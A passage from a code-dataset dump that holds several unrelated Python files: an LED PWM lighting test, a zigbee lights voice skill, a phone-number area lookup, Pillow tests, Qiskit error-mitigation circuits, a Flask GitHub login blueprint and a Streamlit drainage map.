map(g, 0, 1, 0, 100)\n #b1 = map(b, 0, 1, 0, 100)\n r1 = round(r*100, 1)\n g1 = round(g*100, 1)\n b1 = round(b*100, 1)\n print(r1, g1, b1)\n # set the led\n self.set_lights(r1, g1, b1)\n sleep(.1)\n self.set_lights(OFF, OFF, OFF)\n \n def spectrumToRGB(self, w):\n # for a spectrum value, return the RGB as 0-1 value\n if w >= 380 and w < 440:\n R = -(w - 440.) / (440. - 380.)\n G = 0.0\n B = 1.0\n print(\"Violet\", R, G, B)\n elif w >= 440 and w < 490:\n R = 0.0\n G = (w - 440.) / (490. - 440.)\n B = 1.0\n print(\"Blue\", R, G, B)\n elif w >= 490 and w < 510:\n R = 0.0\n G = 1.0\n B = -(w - 510.) / (510. - 490.)\n print(\"Green\", R, G, B)\n elif w >= 510 and w < 580:\n R = (w - 510.) / (580. - 510.)\n G = 1.0\n B = 0.0\n print(\"Orange\", R, G, B)\n elif w >= 580 and w < 645:\n R = 1.0\n G = -(w - 645.) / (645. - 580.)\n B = 0.0\n print(\"Red\", R, G, B)\n elif w >= 645 and w <= 780:\n R = 1.0\n G = 0.0\n B = 0.0\n print(\"IR\", R, G, B)\n else:\n R = 0.0\n G = 0.0\n B = 0.0\n\n return R, G, B\n\n def sun(self, RISE=True):\n R1 = 110\n R2 = 190\n R3 = 250\n \n G1 = 108\n G2 = 140\n G3 = 215\n \n B1 = 135\n B2 = 175\n B3 = 160\n\n MAX = 50\n \n MIN = 1\n MAX = 50\n INC = 1\n \n if RISE:\n print(\"Sunrise\")\n for x in range(MIN, MAX, INC):\n w = R1 + x*(R2 - R1)/MAX\n r = round(map(w, 0, 256, 0, 100), 1)\n w = G1 + x*(G2 - G1)/MAX\n g = round(map(w, 0, 256, 0, 100), 1)\n w = B1 + x*(B2 - B1)/MAX\n b = round(map(w, 0, 256, 0, 100), 1)\n \n print(x, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.5)\n print(\"Rise\") \n for x in range(MIN, MAX, INC):\n w = R2 + x*(R3 - R2)/MAX\n #print(\"R\", x, w, R2, R3)\n b = round(map(w, 0, 256, 0, 100), 1)\n \n w = G2 + x*(G3 - G2)/MAX\n g = round(map(w, 0, 256, 0, 100), 1)\n \n w = B2 + x*(B3 - B2)/MAX\n b = round(map(w, 0, 256, 0, 100), 1)\n print(x, r, g, b)\n self.set_lights(r, g, b) \n sleep(0.5)\n else:\n print(\"Sunset\")\n for x in range(MAX, MIN, INC*-1):\n w = R2 + x*(R3 - R2)/MAX\n r = round(map(w, 0, 256, 0, 100), 1)\n \n w = G2 + x*(G3 - G2)/MAX\n g = round(map(w, 0, 256, 0, 100), 1)\n \n w = B2 + x*(B3 - B2)/MAX\n b = round(map(w, 0, 256, 0, 100), 1)\n \n self.set_lights(r, g, b) \n sleep(0.5)\n print(\"Ending\") \n for x in range(MAX, MIN, INC*-1):\n w = R1 + x*(R2 - R1)/MAX\n r = round(map(w, 0, 256, 0, 100), 1)\n w = G1 + x*(G2 - G1)/MAX\n g = round(map(w, 0, 256, 0, 100), 1)\n w = B1 + x*(B2 - B1)/MAX\n b = round(map(w, 0, 256, 0, 100), 1)\n \n #print(r, g, b)\n self.set_lights(r, g, b)\n sleep(0.5)\n \n print(\"Done\")\n \n def set_lights(self, r, g, b, w=OFF):\n # change the duty cycle of the RGBW light\n #print(\"Set\", r, g, b)\n # don't accept setting with numeric value lower than MAX\n \n self.pwm_R.ChangeDutyCycle(r)\n self.pwm_G.ChangeDutyCycle(g)\n self.pwm_B.ChangeDutyCycle(b)\n \n def end(self):\n # turn off all the leds\n self.set_lights(OFF, OFF, OFF)\n self.pwm_R.stop()\n self.pwm_G.stop()\n self.pwm_B.stop()\n\n GPIO.cleanup()\n \n \n def kelvin(self):\n import KelvinRGB as K\n step_size = 100\n for i in range(0, 15000, step_size):\n #color = list(map(lambda div: div/255.0, convert_K_to_RGB(i))) + [1]\n #print(color)\n r, g, b = K.convert_K_to_RGB(i)\n r = round(map(r, 0, 256, 0, 100), 1)\n g = round(map(g, 0, 256, 0, 100), 1)\n b = round(map(b, 0, 256, 0, 100), 1) \n print(i, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n \n def kelvin_sunrise(self):\n import KelvinRGB as K\n start = 12000\n end = 5500\n step_size = -100\n step = 100/abs((start - end)/100)\n step_count = step\n for i in range(start, end, step_size):\n #color = list(map(lambda div: div/255.0, convert_K_to_RGB(i))) + [1]\n #print(color)\n r, g, b = K.convert_K_to_RGB(i)\n r = round(map(r, 0, 256, 0, 100), 1)\n # add factor for intensity\n ri = round((r/100) * (step_count), 1)\n g = round(map(g, 0, 256, 0, 100), 1)\n gi = round((g/100) * (step_count), 1)\n b = round(map(b, 0, 256, 0, 100), 1)\n bi = round((b/100) * (step_count), 1)\n #print(i, r, g, b)\n #self.set_lights(r, g, b)\n \n print(i, ri, gi, bi, step_count) \n self.set_lights(ri, gi, bi) \n step_count = step_count + step\n sleep(0.25)\n \n \n def sun2(self, SUNRISE=True):\n import Sunset as s\n step_size = 1\n steps = 20\n # astronomical twilight\n print(\"Astronomical Twilight 1\")\n for step in range(0, steps, step_size):\n r, g, b = s.astronomical_twilight1(step, steps)\n #print(step, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n print(\"Astronomical Twilight 2\")\n for step in range(0, steps, step_size):\n r, g, b = s.astronomical_twilight2(step, steps)\n #print(step, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n # nautical twilight\n print(\"Nautical Twilight\")\n for step in range(0, steps, step_size):\n r, g, b = s.nautical_twilight(step, steps)\n #print(step, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n print(\"Civil Twilight 1\")\n for step in range(0, steps, step_size):\n r, g, b = s.civil_twilight1(step, steps)\n #print(step, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n print(\"Civil Twilight 2\")\n for step in range(0, steps, step_size):\n r, g, b = s.civil_twilight2(step, steps)\n #print(step, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n \n \ndef map(value, R1_Low, R1_High, R2_Low, R2_High):\n # map one range of numbers to another range\n y = (value-R1_Low)/(R1_High-R1_Low)*(R2_High-R2_Low) + R2_Low\n return y\n\ndef test():\n # cycle the leds\n gl = PWM()\n try:\n\n while True:\n print(\"Red\")\n for r in range(0, 100):\n gl.set_lights(r, OFF, OFF)\n print(\"Cycle R\", r)\n sleep(0.1)\n gl.set_lights(OFF, OFF, OFF)\n print(\"Green\")\n for g in range(0, 100):\n gl.set_lights(OFF, g, OFF)\n print(\"Cycle G\", g)\n sleep(0.1)\n gl.set_lights(OFF, OFF, OFF)\n print(\"Blue\")\n for b in range(0, 100):\n gl.set_lights(OFF, OFF, b) \n print(\"Cycle B\", b)\n sleep(0.1)\n gl.set_lights(OFF, OFF, OFF)\n except KeyboardInterrupt:\n pass\n \n gl.end()\n \ndef test1():\n # Check minimum dimming\n print(\"Check dimming\")\n gl = PWM()\n gl.set_lights(1, 1, 1)\n sleep(10)\n gl.set_lights(100, 100, 100)\n sleep(10)\n \n gl.end()\n print(\"Done\")\n\ndef test3():\n # Run rainbow spectrum from Violet to Red\n gl = PWM()\n gl.spectrum()\n gl.end()\n \ndef test2(): \n # Run rainbow spectrum from Violet to Red\n gl = PWM()\n gl.sun()\n gl.sun(False)\n gl.end()\n \ndef test4(): \n # Run rainbow spectrum from Violet to Red\n print(\"Kelvin\")\n gl = PWM()\n gl.kelvin()\n gl.end()\n print(\"Done\")\n\ndef test5(): \n import Sunset\n print(\"Sunrise\")\n gl = PWM()\n gl.sun2()\n gl.end()\n print(\"Done\")\n\n \ndef test6():\n\n print(\"Dim\")\n sc_r = 21\n sc_g = 40\n sc_b = 82\n\n so_r = round(map(253, 0, 255, 0, 100), 1)\n so_g = round(map(94, 0, 255, 0, 100), 1)\n so_b = round(map(83, 0, 255, 0, 100), 1)\n \n r = so_r\n g = so_g\n b = so_b\n gl = PWM()\n \n for x in range(0, 50):\n r = r -1\n if r < 0:\n r = 0\n g = g -1\n if g < 0:\n g = 0\n b = b -1\n if b < 0:\n b = 0\n gl.set_lights(r, g, b)\n print(x, r, g, b)\n sleep(0.5)\n gl.end()\n print(\"Done\")\n \ndef test7():\n # Cycle colors in increasing brightness\n gl = PWM()\n s = 0.05\n for x in range(0, 101):\n print(x)\n gl.set_lights(x, OFF, OFF)\n sleep(s)\n gl.set_lights(OFF, x, OFF)\n sleep(s)\n gl.set_lights(OFF, OFF, x)\n sleep(s)\n\n gl.end() \n \ndef test9():\n # Increase white\n gl = PWM()\n gl.kelvin_sunrise()\n gl.end()\n \n \n \n \n\nif __name__ == \"__main__\":\n #test() # cycle all lights\n #test1() # check dimming\n #test2() # Sunrise\n #test3() # spectrum\n #test4() # kelvin\n #test5() # sunset\n #test6() # dimming\n test7() # increase cycle\n #test8() # incease white\n #test9() # Kelvin_Sunset\n\n","repo_name":"webbhm/FlaskExperiment","sub_path":"python/PWM_Test.py","file_name":"PWM_Test.py","file_ext":"py","file_size_in_byte":11365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24515986257","text":"#!/usr/bin/env python3\n\nfrom colors import css_colors\nfrom functools import wraps\nfrom snips_skill import *\nimport json, random, time\n\n\n_, ngettext = get_translations( __file__)\n\n\ndef require_capability( capability, response=_(\"That's impossible\")):\n 'Decorator to ensure a device capability'\n def wrapper( method):\n @wraps( method)\n def wrapped( client, userdata, msg):\n client.capability( msg.payload, capability, response)\n return method( client, userdata, msg)\n return wrapped\n return wrapper\n\n\ndef confirm( *args):\n return random.choice( 2 * args + CONFIRMATIONS)\n\n\nclass LightsSkill( MultiRoomConfig, Skill):\n \n 'Control lights and switches via zigbee2mqtt'\n \n LOCATION_SLOT = 'location'\n \n SETTINGS = {} # Stores device state, keyed by device name\n \n \n @topic( 'zigbee/+', payload_converter=json.loads)\n def status( self, userdata, msg):\n 'Collect zigbee2mqtt device status reports'\n self.log.debug( 'Payload: %s', msg.payload)\n device = msg.topic.split('/')[1]\n self.SETTINGS[ device] = msg.payload\n\n\n def get_status( self, payload, key):\n conf = self.get_room_config( payload)\n device = conf.get( 'device')\n if device:\n settings = self.SETTINGS.get( device)\n if settings is not None:\n return settings.get( key)\n \n\n def capability( self, payload, capability, response=_(\"That's impossible\")):\n 'Check against the config that a given device can handle the requested action'\n caps = self.get_room_config( payload).get( 'capabilities', '')\n if capability not in map( lambda s: s.strip(), caps.split( ',')):\n raise SnipsError( response)\n\n\n def switch( self, msg, args, response=_('done')):\n ''' Manipulate a device through zigbee2mqtt.\n If a confirmation is requested in the device config,\n send an audible reply.\n '''\n if self.all_rooms( msg.payload):\n for conf in self.configuration.values():\n device = conf.get( 'device')\n if device: self._switch( device, args)\n return response\n \n self._switch( self._get_device( msg.payload), args)\n if not self.in_current_room( msg.payload):\n return response\n\n\n def _get_device( self, payload, msg=_('unknown device')):\n conf = self.get_room_config( payload)\n device = conf.get( 'device')\n if device is None: raise SnipsError( msg)\n return device\n \n \n def _switch( self, device, args):\n base_topic = self.get_config().get( 'base_topic', 'zigbee2mqtt')\n topic = '%s/%s/set' % (base_topic, device)\n self.publish( topic, json.dumps( args))\n\n \n @intent( 'domi:LampenAusSchalten', silent=True)\n @min_confidence( 0.6)\n def switch_off( self, userdata, msg):\n if self.get_status( msg.payload, 'state') == 'OFF':\n return _('It is already off')\n return self.switch( msg, { 'state' : 'OFF' },\n confirm( _('switched off')))\n \n\n @intent( 'domi:LampenAnSchalten', silent=True)\n @min_confidence( 0.6)\n def switch_on( self, userdata, msg):\n args = { 'state' : 'ON' }\n if 'brightness' in msg.payload.slots:\n percent = msg.payload.slot_values['brightness'].value\n if percent < 5:\n return self.switch_off( userdata, msg)\n if percent <= 95:\n self.capability( msg.payload, 'brightness',\n _('This device can be only switched on or off.'))\n args[ 'brightness'] = 254 * percent / 100\n elif self.get_status( msg.payload, 'state') == 'ON':\n return _('It is already on')\n\n return self.switch( msg, args, confirm( _('switched on')))\n\n\n @intent( 'domi:FarbeWechseln', silent=True)\n @min_confidence( 0.6)\n @require_capability( 'color')\n @require_slot( 'color', prompt=_('which color?'))\n def change_color( self, userdata, msg):\n css_name = msg.payload.slot_values['color'].value\n if css_name not in css_colors:\n raise SnipClarificationError( _('which color?'), \n payload.intent.intent_name, 'color')\n \n r, g, b = css_colors[ css_name]\n return self.switch( msg, { 'state' : 'ON',\n 'color' : { 'r': r, 'g': g, 'b': b }})\n\n\n @intent( 'domi:LichtDimmen', silent=True)\n @min_confidence( 0.7)\n @require_capability( 'brightness',\n _('This device can be only switched on or off.'))\n @require_slot( 'action', prompt=_('brighter or lower?'))\n def dim_light( self, userdata, msg):\n\n brightness = self.get_status( msg.payload, 'brightness')\n if brightness is None:\n return _(\"That's currently not possible\")\n \n action = msg.payload.slot_values['action'].value\n conf = self.get_room_config( msg.payload)\n offset = conf.getint( 'dim_step', 50)\n if action != 'higher': offset = -offset\n brightness = max( min( 254, brightness + offset), 0)\n \n is_on = self.get_status( msg.payload, 'state')\n if is_on != 'ON' and offset > 0:\n return self.switch( msg,\n { 'state' : 'ON', 'brightness' : offset })\n \n if brightness <= 0:\n return self.switch( msg, { 'state' : 'OFF' })\n\n return self.switch( msg, { 'brightness' : brightness })\n \n\n @intent( 'domi:SzenenSchalten')\n def not_implemented( self, userdata, msg):\n return _('Not yet implemented')\n\n\n# Let's go!\nif __name__ == '__main__': LightsSkill().run()\n","repo_name":"dnknth/snips-lights","sub_path":"action-lights.py","file_name":"action-lights.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43600632445","text":"#!/usr/bin/python \n# -*- coding: utf-8 -*-\n\nimport os\nimport requests\nimport time\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nurl = \"https://tcc.taobao.com/cc/json/mobile_tel_segment.htm\"\n\ndef output(file, value):\n f = open(file, 'a')\n f.write(value)\n f.close()\n\ndef getAera(phone):\n tel = {'tel': phone}\n r = requests.get(url, params=tel)\n if (r.status_code == requests.codes.ok):\n response = r.text\n if response.find(\",\") > 0:\n provice = ((response.split(\",\")[1]).split(\":\")[1]).strip('\\'')\n return phone + \",\" + provice + \"\\n\"\n else:\n return phone + \",\\n\"\n else:\n return phone + \",\\n\"\n\n\n\nif __name__ == \"__main__\":\n\n with open(\"ebook-phone\", \"rb\") as f:\n for line in f:\n output(\"phone2area\", getAera(line.strip()))\n","repo_name":"benbiti/tools-sets","sub_path":"phone2area.py","file_name":"phone2area.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70655488831","text":"import os\nimport unittest\n\nfrom PIL import Image\n\nfrom hotools.pillow_tools import draw_str_at_center, draw_str_at_point\n\nFONT_PATH = \"/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf\"\n\n\nclass PillowToolTest(unittest.TestCase):\n @staticmethod\n def make_image():\n return Image.new('RGBA', (256, 256), (0, 0, 127))\n\n def test_draw_str_at_point(self):\n image = self.make_image()\n draw_str_at_point(\n image,\n \"TEST_STRING\",\n (10, 10),\n font_path=FONT_PATH,\n fore_ground_color=(0, 0, 0),\n back_ground_color=(255, 255, 255)\n )\n image.save(\"_temp/draw_str_at_point.png\")\n\n def test_draw_str_at_center(self):\n image = self.make_image()\n draw_str_at_center(\n image,\n \"TEST_STRING\",\n font_path=FONT_PATH,\n fore_ground_color=(0, 0, 0),\n back_ground_color=(255, 255, 255)\n )\n image.save(\"_temp/draw_str_at_center.png\")\n\n\nif __name__ == '__main__':\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n unittest.main()\n","repo_name":"hosson/hotools","sub_path":"tests/test_pillow_tools.py","file_name":"test_pillow_tools.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41219880227","text":"import numpy as np\r\n\r\n# importing Qiskit\r\nfrom qiskit_ibm_provider import IBMProvider\r\nfrom qiskit import QuantumCircuit, ClassicalRegister, QuantumRegister, transpile, assemble\r\n\r\n#importing Mitiq\r\nfrom mitiq.zne.scaling import fold_gates_at_random\r\nfrom mitiq.interface.mitiq_qiskit import to_qasm, from_qiskit\r\n\r\ndef zz_pump(q, c, p, system, ancilla, ini):\r\n z = QuantumCircuit(q, c)\r\n if ini == \"01\":\r\n z.x(q[system[1]])\r\n elif ini == \"10\":\r\n z.x(q[system[0]])\r\n elif ini == \"11\":\r\n z.x(q[system[0]])\r\n z.x(q[system[1]])\r\n\r\n z.x(q[ancilla])\r\n z.cx(q[system[1]], q[ancilla])\r\n \r\n theta = 2 * np.arcsin(np.sqrt(p))\r\n \r\n z.cry(theta, q[ancilla], q[system[1]])\r\n \r\n z.cx(q[system[1]], q[ancilla])\r\n z.x(q[ancilla])\r\n \r\n z.measure(q[system[0]], c[0])\r\n z.measure(q[system[1]], c[1])\r\n return z\r\n\r\ndef xx_pump(q, c, p, system, ancilla, ini):\r\n xx = QuantumCircuit(q, c)\r\n if ini == \"01\":\r\n xx.x(q[system[1]])\r\n elif ini == \"10\":\r\n xx.x(q[system[0]])\r\n elif ini == \"11\":\r\n xx.x(q[system[0]])\r\n xx.x(q[system[1]])\r\n\r\n xx.x(q[ancilla])\r\n xx.cx(q[system[0]], q[ancilla])\r\n \r\n theta = 2 * np.arcsin(np.sqrt(p))\r\n xx.cry(theta, q[ancilla], q[system[0]])\r\n \r\n xx.cx(q[system[0]], q[ancilla])\r\n xx.x(q[ancilla])\r\n\r\n xx.measure(q[system[0]], c[0])\r\n xx.measure(q[system[1]], c[1])\r\n\r\n return xx\r\n\r\ndef zz_xx_pump(q, c, p, system, ancillae, ini):\r\n zx = QuantumCircuit(q, c)\r\n if ini == \"01\":\r\n zx.x(q[system[1]])\r\n elif ini == \"10\":\r\n zx.x(q[system[0]])\r\n elif ini == \"11\":\r\n zx.x(q[system[0]])\r\n zx.x(q[system[1]])\r\n\r\n #ZZ pump\r\n zx.x(q[ancillae[0]])\r\n zx.cx(q[system[1]], q[ancillae[0]])\r\n \r\n theta = 2 * np.arcsin(np.sqrt(p))\r\n zx.cry(theta, q[ancillae[0]], q[system[1]])\r\n \r\n zx.cx(q[system[1]], q[ancillae[0]])\r\n zx.x(q[ancillae[0]])\r\n\r\n #XX pump\r\n zx.x(q[ancillae[1]])\r\n zx.cx(q[system[0]], q[ancillae[1]])\r\n \r\n zx.cry(theta, q[ancillae[1]], q[system[0]])\r\n \r\n zx.cx(q[system[0]], q[ancillae[1]])\r\n zx.x(q[ancillae[1]])\r\n \r\n zx.measure(q[system[0]], c[0])\r\n zx.measure(q[system[1]], c[1])\r\n \r\n return zx\r\n\r\ndef rewrite_qasm(qasm_str):\r\n lines = qasm_str.split('\\n')\r\n out_lines = []\r\n measure_lines = []\r\n creg_lines = []\r\n final_output = []\r\n for line in lines:\r\n if not line.endswith(';'):\r\n out_lines.append(line)\r\n continue\r\n words = line[:-1].split(' ')\r\n if words[0] == 'measure':\r\n measure_lines.append(line)\r\n elif words[0] == 'creg':\r\n creg_lines.append(line)\r\n else:\r\n out_lines.append(line)\r\n \r\n for line in out_lines:\r\n final_output.append(line)\r\n if line.startswith('qreg'):\r\n final_output.append(f'creg c[{len(creg_lines)}];')\r\n\r\n for line in measure_lines:\r\n words = line[:-1].split(' ')\r\n qword = words[1]\r\n cword = words[3]\r\n final_output.append(f'measure {qword} -> c[{cword[4]}];')\r\n\r\n final_output.append('')\r\n\r\n return '\\n'.join(final_output)\r\n\r\nprovider = IBMProvider()\r\nbackend = provider.get_backend('simulator_statevector')\r\n\r\nshots = 20000\r\nprobs = np.linspace(0,1.0,5)\r\n\r\nwith open('mre_sim_12.txt','w') as job_id_file:\r\n pump_list = [zz_pump,xx_pump,zz_xx_pump]\r\n sys_list = [[1,2],[1,2],[1,2]]\r\n anc_list = [[0],[0],[0,3]]\r\n ini_list = ['00','01','10','11']\r\n scale_factors = [1]\r\n\r\n for scale_factor in scale_factors:\r\n circ_list = []\r\n\r\n for pump,sys,anc in zip(pump_list,sys_list,anc_list): #Loop over pump\r\n for ini in ini_list: #Loop over ini\r\n for p in probs: #Loop over prob\r\n q = QuantumRegister(4, name='q')\r\n c = ClassicalRegister(2, name='c')\r\n #Create circuit\r\n circ = pump(q, c, p, sys, anc, ini)\r\n #Transpile first pass\r\n transpiled = transpile(circ,backend=backend,optimization_level=0)\r\n #Convert to Mitiq\r\n circ_to_mitiq = from_qiskit(transpiled)\r\n #Fold circuit\r\n circ_folded_mitiq = fold_gates_at_random(circ_to_mitiq, scale_factor)\r\n #Convert to Qiskit\r\n circ_folded_qasm = to_qasm(circ_folded_mitiq)\r\n circ_folded = QuantumCircuit.from_qasm_str(circ_folded_qasm)\r\n #Transpile without optimizing\r\n transpiled_folded = transpile(circ_folded, backend=backend, optimization_level=0)\r\n circ_list.append(transpiled_folded)\r\n\r\n job = backend.run(circ_list, shots=shots) #Run job\r\n job_id_file.write(job.job_id()+'\\n') #Write to file\r\n print('Ran job with job id '+job.job_id())\r\n\r\nprint('All complete.')\r\n","repo_name":"JessicaJohnBritto/QOSF_Cohort6","sub_path":"Results_from_paper/IBMQ results/qosf_ibmq_mre.py","file_name":"qosf_ibmq_mre.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35820170592","text":"from flask import Blueprint, Response, request, session, render_template, redirect, flash, url_for\nfrom app.utils import Github\nfrom app.utils import UserAuth\nfrom app.core.models import User\nfrom app.core.forms import UserSettingsForm\n\nmain = Blueprint('core', __name__,template_folder='../templates')\nuser_auth = UserAuth('core.login')\n\n@main.route('user/settings',methods=['GET', 'POST'])\n@user_auth.login_required\ndef user_settings():\n user_id = session.get('user_id')\n user = User.objects.get_or_404(id=user_id)\n\n form = UserSettingsForm(request.form, obj=user)\n \n if request.method == 'POST' and form.validate():\n form.populate_obj(user)\n user.save()\n settings = {'user': user, 'form': form}\n return render_template('core/user_settings.html', settings=settings)\n\n@main.route('login/')\ndef login():\n return render_template('core/login.html')\n\n@main.route('login/github')\ndef github_login():\n github = Github()\n client_id = github.client_id\n endpoint = 'https://github.com/login/oauth/authorize?client_id=%s&scope=user,public_repo,repo,gist'%(client_id)\n return redirect(endpoint, code=307)\n\n@main.route('callback')\ndef auth_callback():\n type_auth = request.args.get('type')\n login_url = url_for('.login')\n\n if type_auth == None:\n flash('Authentication type missing')\n return redirect(login_url, code=307)\n\n if type_auth == 'github':\n code = request.args.get('code')\n\n if code == None:\n flash('Invalid verification code')\n return redirect(login_url, code=307)\n \n github = Github()\n token = github.access_token(code)\n\n if 'error' in token:\n flash('An error has occurred: %s' % token['error'])\n return redirect(login_url, code=307)\n elif 'access_token' in token:\n if user_auth.check_or_create(token['access_token'], type_auth):\n next = session.get('requre_url')\n session.pop('requre_url', None)\n if not next:\n next = request.host_url\n return redirect(next, code=307)\n else:\n flash('unknow error')\n return redirect(login_url, code=307) \n else:\n flash('unknow error')\n return redirect(login_url, code=307)\n else:\n flash('Unknown authentication type')\n return redirect(login_url, code=307)","repo_name":"miguel250/miguelpz-core","sub_path":"app/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"42039838028","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 16 20:29:57 2020\n\n@author: tommo\n\"\"\"\n\n\nimport streamlit as st\nfrom streamlit_folium import folium_static\nimport folium\nimport geopandas as gpd\nimport pandas as pd\n\nfrom streamlit_folium import folium_static\nimport folium\nfrom pyproj import Transformer\ntransformer = Transformer.from_crs(\"epsg:27700\", \"epsg:4326\")\n\nst.markdown(\n f'''\n \n ''',\n unsafe_allow_html=True\n)\n\nst.write(\n \"\"\"\n# Drainage Info from SCANNER survey\n# \"\"\"\n)\n#with st.echo():\n\n@st.cache\ndef load_data():\n gdf_gullies = gpd.read_file('Gulleys Nov 2019/gulleys.shp')\n gdf_gullies.crs = \"EPSG:27700\"\n def transform_coords(X1,Y1):\n return transformer.transform(X1, Y1)\n \n gdf_gullies.loc[:,'X1'] = gdf_gullies.apply(lambda x: transform_coords(x['POINT_X'],x['POINT_Y'])[0], axis=1)\n gdf_gullies.loc[:,'Y1'] = gdf_gullies.apply(lambda x: transform_coords(x['POINT_X'],x['POINT_Y'])[1], axis=1)\n \n \n gdf_gullies.head()\n df = pd.read_parquet('drainage.parquet')\n df.loc[df['LCRV'] > 200,'LCRV'] = 200\n df.loc[df['LCRV'] < -200,'LCRV'] = -200\n return [df, gdf_gullies]\n\ndf, gdf_gullies = load_data()\n\ny = st.sidebar.selectbox(\"Road:\", df['roadcode'].unique(), index=42)\n\ndf2 = df[df['roadcode']==y]\n\nif y == 'A5':\n selected_chainage = st.slider('Chainage in m', int(df2['cumlength'].min()), int(df2['cumlength'].max()), \\\n value=(min(11670, max(0,int(df2['cumlength'].max()-1000))),min(17000, int(df2['cumlength'].max()-50))), step=10)\nelse:\n selected_chainage = st.slider('Chainage in m', int(df2['cumlength'].min()), int(df2['cumlength'].max()), \\\n value=(int(df2['cumlength'].min()), int(df2['cumlength'].max())), step=10)\n \n\nst.write('Selected chainage:', selected_chainage)\n\ndf3 = df2[(df2['SECTIONLABEL'] == 'CL1') & (df2['cumlength'] >= selected_chainage[0]) & (df2['cumlength'] <= selected_chainage[1])]\ndf4 = df2[(df2['SECTIONLABEL'] == 'CR1') & (df2['cumlength'] >= selected_chainage[0]) & (df2['cumlength'] <= selected_chainage[1])]\n\n\nimport mplleaflet\nimport matplotlib.pyplot as plt\nfig, ax = plt.subplots()\nkw1 = dict(color='blue', alpha=0.4, scale=1)\nq1 = ax.quiver(df3['X1'], df3['Y1'], df3['newU'], df3['newV'], **kw1)\ngj1 = mplleaflet.fig_to_geojson(fig=fig)\n#TODO - u,v needs to be second component relative to first stop\n\n\n\nfig, ax = plt.subplots()\nkw2 = dict(color='green', alpha=0.4, scale=1)\nq2 = ax.quiver(df4['X1'], df4['Y1'], df4['newU'], df4['newV'], **kw2)\ngj2 = mplleaflet.fig_to_geojson(fig=fig)\n\nimport folium\n\nfeature_group0 = folium.FeatureGroup(name='Left lane')\nfeature_group1 = folium.FeatureGroup(name='Right lane')\n\nnew_coords = [(df3.X1.min()+df3.X1.max())/2, (df3.Y1.min()+df3.Y1.max())/2]\n\n\n\n#new_coords = transformer.transform((coords[0]+coords[2])/2, (coords[1]+coords[3])/2)\n#def transform_coords(X1,Y1):\n# return transformer.transform(X1, Y1)\n\nmapa = folium.Map(location=new_coords, tiles=\"Cartodb Positron\",\n zoom_start=12, prefer_canvas=True)\n\nfor feature in gj1['features']:\n if feature['geometry']['type'] == 'Point':\n lat, lon = feature['geometry']['coordinates']\n div = feature['properties']['html']\n\n icon_anchor = (feature['properties']['anchor_x'],\n feature['properties']['anchor_y'])\n\n icon = folium.features.DivIcon(html=div,\n icon_anchor=icon_anchor)\n marker = folium.Marker([lat, lon], icon=icon)\n feature_group0.add_child(marker)\n else:\n msg = \"Unexpected geometry {}\".format\n raise ValueError(msg(feature['geometry']))\n\nfor feature in gj2['features']:\n if feature['geometry']['type'] == 'Point':\n lat, lon = feature['geometry']['coordinates']\n div = feature['properties']['html']\n\n icon_anchor = (feature['properties']['anchor_x'],\n feature['properties']['anchor_y'])\n\n icon = folium.features.DivIcon(html=div,\n icon_anchor=icon_anchor)\n marker = folium.Marker([lat, lon], icon=icon)\n feature_group1.add_child(marker)\n else:\n msg = \"Unexpected geometry {}\".format\n raise ValueError(msg(feature['geometry']))\n \n \nmapa.add_child(feature_group0)\nmapa.add_child(feature_group1)\n\nfeature_group2 = folium.FeatureGroup(name='Gullies at recommended spacing', show=False)\ndef plotDot(point):\n '''input: series that contains a numeric named latitude and a numeric named longitude\n this function creates a CircleMarker and adds it to your this_map'''\n #folium.CircleMarker(location=[point.Y1, point.X1],\n # radius=3,\n # weight=1).add_to(mapa)\n #folium.Marker([point['X1'], point['Y1']],\n # #Make color/style changes here\n # icon = folium.simple_marker(color='lightgray', marker_icon='oil'),\n # ).add_to(mapa)\n color_map = {'CL1':'blue','CR1':'green'}\n \n folium.Circle( [point['X1'], point['Y1']], radius=2\n , color=color_map[point['SECTIONLABEL']]\n , fill_color='lightgray'\n , fill=True\n ).add_to(feature_group2)\n \nfeature_group3 = folium.FeatureGroup(name='Actual gullies', show=False)\ndef plotGul(point):\n folium.Circle( [point['X1'], point['Y1']], radius=2\n , color='darkgray'\n , fill_color='black'\n , fill=True\n ).add_to(feature_group3)\n \nfeature_group4 = folium.FeatureGroup(name='Chainages', show=True)\ndef plotChain(point):\n #iframe = folium.IFrame(text, width=700, height=450)\n #popup = folium.Popup(iframe, max_width=3000)\n folium.Marker( [point['X1'], point['Y1']], radius=4\n , color='black'\n #, fill_color='#808080'\n #, fill=True\n , icon=folium.DivIcon(html=str(\"

       %d

